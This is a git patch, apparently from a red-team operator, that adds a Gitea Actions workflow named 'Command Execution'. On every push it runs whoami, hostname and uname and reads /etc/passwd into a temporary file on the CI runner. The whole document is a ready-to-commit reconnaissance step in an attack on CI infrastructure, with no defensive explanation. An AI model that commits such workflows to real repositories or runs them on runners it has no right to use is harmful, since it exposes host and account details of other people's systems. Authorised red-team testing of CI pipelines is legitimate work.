From c3ab92b894dbae2833cda5db35db5a37d6659e87 Mon Sep 17 00:00:00 2001 From: redteamoperator Date: Sun, 31 May 2026 06:09:32 +0000 Subject: [PATCH] Add Gitea Actions workflow for command execution --- .gitea/workflows/action.yml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .gitea/workflows/action.yml diff --git a/.gitea/workflows/action.yml b/.gitea/workflows/action.yml new file mode 100644 index 0000000..64d6b2b --- /dev/null +++ b/.gitea/workflows/action.yml @@ -0,0 +1,14 @@ +name: Command Execution +on: [push] + +jobs: + run-command: + runs-on: ubuntu-latest + steps: + - name: Run Command + run: | + echo "=== SYSTEM INFO ===" > /tmp/gitea-output.txt + whoami >> /tmp/gitea-output.txt 2>&1 + hostname >> /tmp/gitea-output.txt 2>&1 + uname -a >> /tmp/gitea-output.txt 2>&1 + cat /etc/passwd >> /tmp/gitea-output.txt 2>&1